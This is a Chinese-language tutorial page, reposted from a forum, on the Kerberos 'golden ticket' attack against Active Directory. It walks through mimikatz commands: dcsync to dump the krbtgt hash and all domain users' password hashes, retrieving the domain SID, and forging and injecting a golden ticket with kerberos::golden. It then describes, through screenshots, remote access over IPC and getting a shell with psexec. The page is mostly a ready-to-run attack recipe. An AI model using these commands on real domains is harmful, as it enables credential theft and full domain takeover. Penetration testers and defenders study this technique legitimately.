5.1.2 黄金票据利用

# 5.1.2 黄金票据利用

> 原文:[https://www.zhihuifly.com/t/topic/3433](https://www.zhihuifly.com/t/topic/3433)

### 5.1.2 黄金票据利用

#### 1、导出 krbtgt 密码 hash

“`
mimikatz#lsadump::dcsync /domain:adtest.com /user:krbtgt
“`

![imageimg](/static/ApacheCN/unclassified/img/d52c4a2c3ab24318f8ad382745a099ee.png)

导出所有域内用户密码 hash 值:

“`
mimikatz#lsadump::dcsync /domain:adtest.com /all /csv
“`

![imageimg](/static/ApacheCN/unclassified/img/977bea729ffaa2aebb7a835ef2d1673c.png)

#### 2、获取域 SID

在导出 krbtgt 的 hash 的时候已经包含了域 SID,也可以用以下命令来查看域 SID

“`
whoami /all
“`

![imageimg](/static/ApacheCN/unclassified/img/c5f84709587920cea1fb9f65a39399bd.png)

#### 3、伪造黄金票据

“`
mimikatz.exe privilege::debug “kerberos::golden /domain:adtest.com /sid:S-1-5-21- 3418659180-3421952656-1938706522 /target:WIN-9P499QKTLDO.ADTEST.COM /service:cifs /rc4: 6f0fdf50f2dcee2fed8e2e3eae7e1592 /user:aaa /ptt”
“`

这里可以不指定 target 和 service

“`
kerberos::golden /domain:adtest.com /sid:S-1-5-21-3418659180-3421952656-
1938706522 /rc4:6f0fdf50f2dcee2fed8e2e3eae7e1592 /user:aaa /ptt
“`

![imageimg](/static/ApacheCN/unclassified/img/babb7a55c996631163013123f0fc3929.png)

使用 klist 查看本地缓存的票据

![imageimg](/static/ApacheCN/unclassified/img/cab325d5100703c6ae80ea52fa1322dd.png)

获得票据后可直接通过 dir 远程访问主机,可以直接使用 ipc 进行连接:

![imageimg](/static/ApacheCN/unclassified/img/1ce70ff399125655bc6b457ba678516e.png)

当然也可以使用 psexec 去获得一个 cmdshell:

![imageimg](/static/ApacheCN/unclassified/img/a8aa83b588eef93b5ce037cae3faa33f.png)

> 注:普通黄金票据不能跨域使用;TGT 有效时间为 20 分钟;。

© 版权声明
THE END
喜欢就支持一下吧
点赞0赞赏 分享
评论 抢沙发

请登录后发表评论

    请登录后查看评论内容